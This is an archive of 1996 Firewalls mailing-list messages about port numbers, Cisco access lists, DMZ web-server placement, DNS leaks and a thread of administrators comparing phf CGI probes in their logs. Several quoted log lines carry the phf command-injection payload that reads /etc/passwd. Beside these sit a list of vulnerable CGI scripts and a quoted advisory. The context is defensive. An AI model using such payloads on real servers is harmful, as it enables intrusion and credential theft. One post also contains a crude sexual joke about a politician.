DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne) Message-Id: <9607101754.AA08182@dsacg1.dsac.dla.mil> Subject: Re: Well Known Port Numbers To: lazar@netevolve.com Date: Wed, 10 Jul 96 13:54:32 EDT Cc: firewalls@greatcircle.com In-Reply-To: <9607101332.AA12409@netevolve.com>; from "Irwin Lazar" at Jul 10, 96 9:29 am Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Greetings all: > > I'm trying to find the well known TCP and UDP port numbers to allow > access to Usenet and WAIS but can't seem to find them in any of the > reference materials I have. Does anyone know of or have this > information? from /etc/services nntp 119/tcp readnews untp # Network News Transfer Protocol from the wais paper 5. Add in a z3950 entry to /etc/services on TCP port 210. 6. Add a line like the following to /etc/inetd to cause waisserver to be called when a connection comes in on the z3950 port: z3950 stream tcp nowait nobody " nntp (news) is port 119 wais (z3950) is port 210 both are tcp stevep > > Thanks. > Irwin M. Lazar > Network Evolutions, Inc. > lazar@netevolve.com > From firewalls-owner Wed Jul 10 13:25:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA13533 for firewalls-outgoing; Wed, 10 Jul 1996 12:32:51 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA13523 for ; Wed, 10 Jul 1996 12:32:36 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607101929.AA22741@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: "John M. Shaw" Cc: firewalls From: Ryan.Russell/SYBASE Date: 10 Jul 96 12:22:45 EDT Subject: Re: Re[2]: Newbie Cisco Access-List Question X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It depends. If the two serials plug into the same router at the other end, then you want a mux, or you'll have to run EIGRP or OSPF...even then, good luck. If they go to two different ISPs, then get route updates for both, and the router will make the best choice for path. However, one of the interfaces will have to be the default, and usage of the two lines will be highly asymmetric. Even if one line fills, it won't overflow to the other. Ryan ---------- Previous Message ---------- To: firewalls cc: From: jshaw @ dttus.com ("John M. Shaw") @ smtp Date: 07/10/96 10:38:05 AM Subject: Re[2]: Newbie Cisco Access-List Question Is is the same for "ip route": If I have 2 lines from my ISP hooked up to the serial lines on my router : ip route 0.0.0.0 0.0.0.0 Serial0 ip route 0.0.0.0 0.0.0.0 Serial1 Will anything get sent over Serial1? Is there a way to somewhat balance the load between the 2 lines? TIA jshaw@dttus.com ______________________________ Reply Separator _________________________________ Subject: Re: Newbie Cisco Access-List Question Author: Warren Auld at INTERNET-USA Date: 7/10/96 10:08 AM Hi, Yes, order matters -- the entries in an access list are evaluated sequentially until a match is found at which point the packet is either sent on or rejected. In the example you gave below, all packets addressed to ports higher than 1023 will make it through and the second line will never have any effect. If you reverse the lines, traffic to port 2049 would be denied while everything else above 1023 would get through. Hope this helps.... warren wauld01@mail.state.mo.us On Wed, 10 Jul 1996, John M. Shaw wrote: > > > Assuming 2 lines with same source, s-mask, dest, and d-mask: > > access-list 101 permit tcp source s-mask dest d-mask gt 1023 > access-list 101 deny tcp source s-mask dest d-mask eq 2049 > > Which one takes precedence? > Does the order matter? > > Any help would be greatly appreciated? > > From firewalls-owner Wed Jul 10 14:13:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA22519 for firewalls-outgoing; Wed, 10 Jul 1996 13:41:26 -0700 (PDT) Received: from umbc7.umbc.edu (f-umbc7.umbc.edu [130.85.3.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA22471 for ; Wed, 10 Jul 1996 13:41:14 -0700 (PDT) Received: (from pauld@localhost) by umbc7.umbc.edu (8.6.12/Umbc) id QAA10461; Wed, 10 Jul 1996 16:38:42 -0400 Date: Wed, 10 Jul 1996 16:38:42 -0400 (EDT) From: Paul Danckaert To: meowmyx@morebbs.com cc: firewalls@GreatCircle.COM Subject: Re: Dirty dogs In-Reply-To: <9607101528.0LQZ300@morebbs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996 meowmyx@morebbs.com wrote: > > I was browsing through the system files of a web server that sits outside a > firewall There were a couple of interesting entries in the access log > > 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] > "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > > 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] > "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > > This didnt work for two reasons One there is no phf program in the system > Two the cgi application gateway is running chrooted > > I am not really very good at understanding this hacking and cracking stuff > What else could they have tried that might have worked Its pretty common to attack systems via the phf hole right now.. we see a fair ammount of attacks towards that. That format is the same as some of the probes we have seen, so its probably one of the scripts floating around. There is another that hides the "cat /etc/passwd" in the middle of a larger string, trying to make it less obvious, and a third that runs id, to see what uid your web server runs under. Of course, you could always be less kind, and install a quick PHF script on your server that mails you all the information it can about the user connecting to it. Nice for a more real-time response against these probes. As for other CGIs that could have worked, a good reference for this stuff is in the WWW security FAQ, at: http://www.genome.wi.mit.edu/WWW/faqs/www-security-faq.html It lists other vulnerable CGI scripts offhand: AnyForm http://www.uky.edu/~johnr/AnyForm2 FormMail http://alpha.pr1.k12.co.us/~mattw/scripts.html "phf" phone book script, distributed with NCSA httpd and Apache http://hoohoo.ncsa.uiuc.edu/ (There are also vulnerabilities with the novell web server, as well as ones under NT..) In general, you should never have CGI scripts/programs in your cgi-bin directory that you aren't using, or don't trust.. paul From firewalls-owner Wed Jul 10 14:57:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA00886 for firewalls-outgoing; Wed, 10 Jul 1996 14:41:31 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA00873 for ; Wed, 10 Jul 1996 14:41:16 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607102138.AA03032@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: meowmyx Cc: firewalls From: Ryan.Russell/SYBASE Date: 10 Jul 96 14:12:45 EDT Subject: Re: Dirty dogs X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hmm....worth tracking down. I guess whatever they might have succedded at depeneds on any known holes for your web server. You'll probably have better luck tracking down the one hanging off of Sprintnet than AOL. I wouldn't trust AOL to keep any useful records. In any case, if you wanna track them down, the sooner the better. If either site does keep records, better ask before they are gone. Ryan mcorange>trace 198.69.26.81 Type escape sequence to abort. Tracing the route to 198.69.26.81 1 BORDER7-SERIAL1-3.SANFRANCISCO.MCI.NET (204.70.161.17) 4 msec 56 msec 28 mse c 2 CORE2-FDDI-0.SANFRANCISCO.MCI.NET (204.70.158.49) 212 msec 36 msec 32 msec 3 CORE3.SANFRANCISCO.MCI.NET (204.70.4.17) 16 msec 16 msec 32 msec 4 * SOMEROUTER.SPRINTLINK.NET (206.157.77.66) 28 msec 8 msec 5 SL-STK-5-F0/0.SPRINTLINK.NET (144.228.40.5) 20 msec 12 msec 16 msec 6 SL-DC-6-H1/0-T3.SPRINTLINK.NET (144.228.10.1) 84 msec 76 msec 80 msec 7 SL-DC-5-F0/0.SPRINTLINK.NET (144.228.20.5) 80 msec 80 msec 84 msec 8 SL-NIS-1-S0-56K.SPRINTLINK.NET (144.228.25.38) 108 msec 112 msec 108 msec 9 * * * 10 * * ä mcorange>trace 152.163.192.15 Type escape sequence to abort. Tracing the route to WWW-B2.PROXY.AOL.COM (152.163.192.15) 1 BORDER7-SERIAL1-3.SANFRANCISCO.MCI.NET (204.70.161.17) 8 msec 12 msec 8 msec 2 CORE2-FDDI-0.SANFRANCISCO.MCI.NET (204.70.158.49) 12 msec 12 msec 24 msec 3 CORE1.SANFRANCISCO.MCI.NET (204.70.4.169) 24 msec 28 msec 40 msec 4 BORDER2-FDDI0-0.SANFRANCISCO.MCI.NET (204.70.3.162) 12 msec 8 msec 8 msec 5 MFX.CNSS8.SAN-FRANCISCO.T3.ANS.NET (206.157.77.2) 20 msec 8 msec 4 msec 6 FT0.CNSS19.LOS-ANGELES.T3.ANS.NET (140.222.19.1) 16 msec 24 msec 16 msec 7 FT1.CNSS112.ALBUQUERQUE.T3.ANS.NET (140.222.112.2) 52 msec 48 msec 48 msec 8 FT0.CNSS64.HOUSTON.T3.ANS.NET (140.222.64.1) 84 msec 76 msec 68 msec 9 FT1.CNSS104.ATLANTA.T3.ANS.NET (140.222.104.2) 104 msec 100 msec 112 msec 10 FT0.CNSS72.GREENSBORO.T3.ANS.NET (140.222.72.1) 104 msec 100 msec 100 msec 11 FT0.CNSS56.WASHINGTON-DC.T3.ANS.NET (140.222.56.1) 104 msec 96 msec 128 msec 12 F1-0.C56-11.WASHINGTON-DC.T3.ANS.NET (140.222.56.65) 112 msec 100 msec 100 m sec 13 ENSS150.T3.ANS.NET (204.151.29.10) 104 msec 200 msec 132 msec 14 INET3-GW.BLUE.AOL.COM (198.81.0.43) 108 msec 100 msec 104 msec 15 WWW-B2.PROXY.AOL.COM (152.163.192.15) 116 msec 108 msec 100 msec ---------- Previous Message ---------- To: firewalls cc: From: meowmyx @ morebbs.com @ smtp Date: 07/10/96 03:28:54 PM Subject: Dirty dogs I was browsing through the system files of a web server that sits outside a firewall There were a couple of interesting entries in the access log 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 This didnt work for two reasons One there is no phf program in the system Two the cgi application gateway is running chrooted I am not really very good at understanding this hacking and cracking stuff What else could they have tried that might have worked FlameThrower>> ON The Mayor of White Water, had a very pretty daughter, Her name was Sweet Hillary, she was eager to please. Although lovely Hillary, wore clothes that were billowy, The hairs on her dickey die doe, hung down to her knees. One black one, one white one, and one that Bill caught a trout on, The hairs on her dickey die doe, hung down to her knees. If she were my daughter, I would have cut them much shorter, The hairs on her dickey die doe, hung down to her knees. Ooops Damn Slightly singed left whiskers FlameThrower>> OFF MeOwMyX From firewalls-owner Wed Jul 10 15:05:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA02260 for firewalls-outgoing; Wed, 10 Jul 1996 14:56:40 -0700 (PDT) Received: from magellan.knight-ridder.com (magellan.knight-ridder.com [206.28.156.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA02252 for ; Wed, 10 Jul 1996 14:56:32 -0700 (PDT) Received: by magellan.knight-ridder.com; id OAA08855; Wed, 10 Jul 1996 14:52:26 -0400 Received: from unknown(166.108.10.12) by magellan.knight-ridder.com via smap (g3.0.3) Message-ID: <31E42682.5C54@knight-ridder.com> Date: Wed, 10 Jul 1996 17:54:10 -0400 From: Ricardo de La Fuente Reply-To: lafuente@knight-ridder.com Organization: Knight-Ridder, Inc. X-Mailer: Mozilla 3.0b3Gold (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Web Server on DMZ References: <9607101802.AA02049@manzanita.DEV.3Com.COM.noname> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bob Konigsberg wrote: > > Yes, you can put the web server on your DMZ, but the real answer here > is to run TWO firewalls. > > Like so: > > --company net ---/Corp-Firewall/---DMZ w/servers---/outer firewall/ --Internet > > The job of the Corp-Firewall is to protect the company network, the > job of the outer firewall is to protect the exposed servers. > > If necessary, the outer firewall can also be used as a backup corp > firewall. Or better yet, to complement it by using a different technology > which will help make your network harder to crack into. > > BobK I believe it was Darren Reed who suggested a more elegant and less expensive solution by using a third interface on the firewall thus enabling a third segment for public servers such as a Web server or FTP server. All traffic would have to go through the firewall therefore protecting your web server as well. i.e. Internet Router | | Internal Net----Choke router ----Corp-Firewall ------Web Server, FTP server, etc. -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ : > . > _____ :. _____ > \ \ . / / >Ricardo de La Fuente \ \ || / / >Knight-Ridder, Inc. \_ _\ /^^^^^|| /_ _/ >One Herald Plaza \ \ [o]~[o]| / / >Miami, Florida 33132-1693 \ \ \ ^ // / / > / \ \_O=/ / \ > |___|__/ \__|___| / / \ \ -o00o==O________/__/ -------------------------------------- > Stay Cool - Play Coed Underwater Hockey > From firewalls-owner Wed Jul 10 15:20:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA04812 for firewalls-outgoing; Wed, 10 Jul 1996 15:12:32 -0700 (PDT) Received: from sapa.inka.de (sapa.inka.de [193.197.84.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA04772 for ; Wed, 10 Jul 1996 15:12:14 -0700 (PDT) Received: from uu.inka.de (root@[193.197.84.8]) by sapa.inka.de Received: from lina (ecki@lina.inka.de) by uu.inka.de Received: by lina Message-Id: From: ecki@lina.inka.de (Bernd Eckenfels) Subject: Re: Web Server on DMZ To: ggh14854@ussun2f.glaxo.com Date: Wed, 10 Jul 1996 23:59:39 +0200 (MET DST) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Gary G. Hull" at Jul 10, 96 09:03:44 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, > What would be the security > implications of moving our WEB Server to the DMZ? The server has to be secure. If the server needs to access data from internal net you might be in trouble. The DMZ router should filter all connections from outside except for the www port. > What would > be the best way to make it secure? Disbale anything you dont need. There should be NO line on "netstat -a" which u dont understand. Open logins only from inside secure net and ensure no ip-spoofing is possible to the dmz. > We would like to do this > for performance reasons. Would having a box dedicated to WEB > traffic located on the DMZ offer added performance to our > WEB traffic? Depends on the solution u have now. if you have a proxying firewall or a non-dedicated web server a dedicated web server with no firewall will be faster anyway. > one could expect from the TIS Gauntlet for Web Traffic? Compared to other Proxie firewalls very high, but Package filter firewalls are generally faster. Sie TIS WWW Page for a speed test in some labs. Greetings Bernd From firewalls-owner Wed Jul 10 15:34:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05078 for firewalls-outgoing; Wed, 10 Jul 1996 15:15:34 -0700 (PDT) Received: from cypress.cycon.com (cypress.CYCON.COM [204.5.16.32]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA05069 for ; Wed, 10 Jul 1996 15:15:26 -0700 (PDT) Received: (from carlson@localhost) by cypress.cycon.com (8.7.5/8.7.3) id SAA14482; Wed, 10 Jul 1996 18:13:47 -0400 Date: Wed, 10 Jul 1996 18:13:47 -0400 (EDT) From: Chris Carlson To: meowmyx@morebbs.com cc: firewalls@GreatCircle.COM Subject: Re: Dirty dogs In-Reply-To: <9607101528.0LQZ300@morebbs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996 meowmyx@morebbs.com wrote: > > I was browsing through the system files of a web server that sits outside a > firewall There were a couple of interesting entries in the access log > > 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] > "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > > 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] > "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > > > MeOwMyX > I found this reference to the cgi-bin program 'phf' at some archive site: - Please disable the cgi-bin application 'phf' (provided in source code - form with the NCSA & Apache httpd server distributions in its cgi-src - directory as the file phf.c) that you have available on your WWW server: - it contains a vulnerability that can be exploited by remote clients as an - avenue through which to read files on your system (e.g. /etc/passwd), execute - arbitrary commands, create and write to files, and to possibly gain - unauthorized interactive (login) access without password authentication - and without leaving a significant system audit trail. - - All of these actions can be accomplished with the effective permissions - of the userid that your httpd daemon runs and services requests under. - - I have confirmed that your particular system is vulnerable to some - degree. Please review your httpd access_log for instances of the string - "phf" to see if attempts have been made to exploit this vulnerability on - your system. - - (You will find instances of that string resulting from connections - initiated by aleph1.mit.edu [18.238.0.138]; this was me verifying - your system's vulnerability during a general survey of its widespread - nature.) - - Thank you, and please pass word of this vulnerability to other WWW - server administrators. - - - Nat Friedman (617-225-6733) - ndf@linux.mit.edu Hope this helps! Chris ******************************************************************** * Chris Carlson email: carlson@cycon.com * * Cypress Consulting, Inc. http://www.cycon.com * * Cycon Labyrinth Firewall - Stateful Inspection, Packet Modifier * ******************************************************************** From firewalls-owner Wed Jul 10 15:49:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA08125 for firewalls-outgoing; Wed, 10 Jul 1996 15:39:20 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA08062 for ; Wed, 10 Jul 1996 15:39:06 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA09053 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Wed, 10 Jul 96 15:35:15 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607102235.AA02245@manzanita.DEV.3Com.COM.noname> To: Firewalls@GreatCircle.COM, lafuente@knight-ridder.com Subject: Re: Web Server on DMZ Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've seen that solution recommended, and I would agree, it is elegant. The one problem I have with that is that if the machine crashes, you are Out-To-Lunch for connectivity. I prefer having backup systems that can be put into place easily. In addition, if you are running multiple pieces of equipment, they can be configured to a) provide a more difficult-to-get-through firewall config, and b) Back each other up. I'm not knocking the concept, I plan to make use of a variant myself, I just feel that redundancy is the way to go. BobK From firewalls-owner Wed Jul 10 16:19:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA12590 for firewalls-outgoing; Wed, 10 Jul 1996 16:06:59 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA12562 for ; Wed, 10 Jul 1996 16:06:50 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id QAA15030; Wed, 10 Jul 1996 16:04:12 -0700 Date: Wed, 10 Jul 1996 16:04:12 -0700 (PDT) From: Robert Hanson To: jbarnett@micron.net cc: firewalls@GreatCircle.COM Subject: Re: Sidewinder Versus EagleRaptor In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk in response to this... without searching the web "i barely have enough time in the day to run to the coffee pot :)... where are these poroducts on the web... thanks! ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com On Wed, 10 Jul 1996 jbarnett@micron.net wrote: > My organization is finally coming close to making a decision on a firewall > product. My question is this: is there anyone in this group who has > evaluated both Sidewinder and EagleRaptor within the past year and has: > > 1) selected EagleRaptor but now wishes they had gone with Sidewinder > > 2) selected Sidewinder but now wishes they had gone with EagleRaptor > > 3) selected EagleRaptor for NT and is experiencing difficulties or is elated > > You can respond privately to me at jbarnett@micron.net, please. Since this is > the first time I have tried to post anything to this group (I just joined > today), please forgive me if I somehow stepped on any rules for posting. > Thanks! jon > > ######################################################### > Jon Barnett jbarnett@micron.net > (208) 384-7018 > "Colorful ideas are a pigment of your own imagination" > ######################################################### > From firewalls-owner Wed Jul 10 18:04:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA18275 for firewalls-outgoing; Wed, 10 Jul 1996 17:56:20 -0700 (PDT) Received: from www.cep.yale.edu (www.cep.yale.edu [130.132.125.66]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA18267 for ; Wed, 10 Jul 1996 17:56:11 -0700 (PDT) Received: (from adept@localhost) by www.cep.yale.edu (8.6.12/8.6.9) id VAA24101; Wed, 10 Jul 1996 21:55:04 -0400 Date: Wed, 10 Jul 1996 21:55:04 -0400 (EDT) From: Ben To: firewalls@greatcircle.com Subject: Re: Dirty dogs In-Reply-To: <9607101528.0LQZ300@morebbs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996 meowmyx@morebbs.com wrote: > > I was browsing through the system files of a web server that sits outside a > firewall There were a couple of interesting entries in the access log > > 960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] > "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > > 960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] > "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 We got a lot of these too: access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 - Not original but they tried--looks like an automated script judging from the similarities of the log entries. In any case does anyone else have any experiences with this? I know the problem and all, I'm just trying to get an idea of how widespread this is. Ben. ____ Ben Samman..............................................samman@cs.yale.edu Donnez-moi une bonne erreur fructueuse chaque fois, pleine de semences, debordante de ses corrections. Vous pouvez garder votre verite sterile a vous. - Vilfredo Pareto From firewalls-owner Wed Jul 10 19:34:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA21669 for firewalls-outgoing; Wed, 10 Jul 1996 19:31:06 -0700 (PDT) Received: from lapsene.mii.lu.lv (lapsene.mii.lu.lv [159.148.60.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA21642 for ; Wed, 10 Jul 1996 19:30:57 -0700 (PDT) Received: (from uulda@localhost) by lapsene.mii.lu.lv (8.7.5/8.7.1) id FAA19529 for firewalls@greatcircle.com; Thu, 11 Jul 1996 05:28:20 +0300 (EET DST) X-Authentication-Warning: lapsene.mii.lu.lv: uulda set sender to lda!lda.gov.lv!uldis@lda.gov.lv using -f >Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: from lda by lapsene.mii.lu.lv; Thu, 11 Jul 1996 05:28 EET Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: by lda.gov.lv (FIDO2UU 1.92d [DOS]); To: firewalls@greatcircle.com From: Uldis Bojars Message-Id: <31E4812A@lda.gov.lv> Subject: Web Server on DMZ Date: Thu, 11 Jul 1996 00:20:58 +0200 Lines: 20 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bob, b> Yes, you can put the web server on your DMZ, but the real answer here b> is to run TWO firewalls. b> Like so: b> --company net -+-/Corp-Firewall/-+-DMZ w/servers-+-/outer firewall/ b> --Internet Can a properly configured cisco router be used as an outer firewall to provide protection (no protectio is absolute of course) for DMZ? Uldis --- GoldED/386 2.50.B0822+ From firewalls-owner Wed Jul 10 19:55:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA22002 for firewalls-outgoing; Wed, 10 Jul 1996 19:37:29 -0700 (PDT) Received: from services (services.state.mo.us [168.166.0.67]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA21989 for ; Wed, 10 Jul 1996 19:37:21 -0700 (PDT) Received: from services by services (SMI-8.6/SMI-SVR4) Date: Wed, 10 Jul 1996 21:34:49 -0500 (CDT) From: James Proffer X-Sender: james@services To: firewalls@greatcircle.com Subject: Re: Dirty dogs In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > We got a lot of these too: > > access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET > /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 - > > Not original but they tried--looks like an automated script judging from > the similarities of the log entries. > > In any case does anyone else have any experiences with this? I know the > problem and all, I'm just trying to get an idea of how widespread this is. Our one and only attmpt was on July 4 of this year. slip51.genstar.net - - [04/Jul/1996:00:37:24 -0500] "GET /cgi-bin/phf?Qalias=x%0 a/bin/cat%20/etc/passwd HTTP/1.0" 403 0 Missouri State Data Center <*> James Proffer: UNIX sysadm Missouri Government Information | mailto:james@mail.state.mo.us for the citizens of Missouri | http://www.state.mo.us/server.html and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299 From firewalls-owner Wed Jul 10 20:19:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA23950 for firewalls-outgoing; Wed, 10 Jul 1996 20:04:26 -0700 (PDT) Received: from mail.ee.net (mail.ee.net [206.31.38.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA23934 for ; Wed, 10 Jul 1996 20:04:18 -0700 (PDT) Received: from goffer.research.megasoft.com ([206.230.35.93]) by mail.ee.net (8.7.4/8.7.3) with SMTP id XAA13552; Wed, 10 Jul 1996 23:00:28 -0400 (EDT) Received: by goffer.research.megasoft.com (SMI-8.6/SMI-SVR4) Date: Wed, 10 Jul 1996 22:57:37 -0400 Message-Id: <199607110257.WAA24402@goffer.research.megasoft.com> From: C Matthew Curtin To: Shepherd Rudie Cc: "'firewalls@greatcircle.com'" Subject: Re: DNS leakage In-Reply-To: References: Reply-To: cmcurtin@fahlgren.com X-Attribution: Matt Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> "SR" == Shepherd Rudie writes: SR> Problem is this: The last time my zone was transferred to my ISP, SR> the INTERNAL names suddenly appeared on the internet! Of course SR> this wrecked e-mail and other things as well, but how is this SR> possible? How can the outside DNS provide the secondary with any SR> information regarding the inside? BTW the inside network is not SR> even accessible from the Internet (and thus the secondary SR> DNS). Any ideas? You need to figure out which file with your internal stuff is being sent outside. Make sure that there aren't any major errors like internal stuff in outside zones, etc., and then once you've located the files with the inside stuff, take a look at your zone transfer logs. That will tell you how things got sent out... The man page on named is your friend. -- C Matthew Curtin Chief Hacker Fahlgren, Inc. 655 Metro Pl S, Ste 700, Box 7159 Dublin OH 43017-7159 http://www.local.com/~cmcurtin/ cmcurtin@fahlgren.com PGP Mail Preferred From firewalls-owner Wed Jul 10 21:27:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA00898 for firewalls-outgoing; Wed, 10 Jul 1996 21:19:30 -0700 (PDT) Received: from mercury.hypersurf.com (mercury.hypersurf.com [204.69.218.162]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA00890 for ; Wed, 10 Jul 1996 21:19:24 -0700 (PDT) Received: (from dcarney@localhost) by mercury.hypersurf.com (8.6.10/8.6.10) id VAA26247; Wed, 10 Jul 1996 21:20:15 -0700 Date: Wed, 10 Jul 1996 21:20:15 -0700 From: Don Carney Message-Id: <199607110420.VAA26247@mercury.hypersurf.com> To: firewalls@GreatCircle.COM, james@mail.state.mo.us Subject: Re: Dirty dogs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We had one on July 2nd. slip50.genstar.net - - [02/Jul/1996:16:46:55 -0700] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 27121 maybe someone should send a note to genstar.net Don Carney Hypersurf Internet Services From firewalls-owner Wed Jul 10 21:34:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA01028 for firewalls-outgoing; Wed, 10 Jul 1996 21:23:39 -0700 (PDT) Received: from mailhost.worldnet.att.net (mailhost.worldnet.att.net [204.127.129.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA01020 for ; Wed, 10 Jul 1996 21:23:32 -0700 (PDT) Received: by mailhost.worldnet.att.net (SMI-8.6/SMI-SVR4) Received: from 36.orlando-2.fl.dial-access.att.net(199.70.197.36) Message-ID: <31E4821F.3D7@worldnet.att.net> Date: Thu, 11 Jul 1996 00:25:03 -0400 From: "Syer A. Caudill" Reply-To: howzit@worldnet.att.net X-Mailer: Mozilla 3.0b4Gold (Win95; I) MIME-Version: 1.0 To: 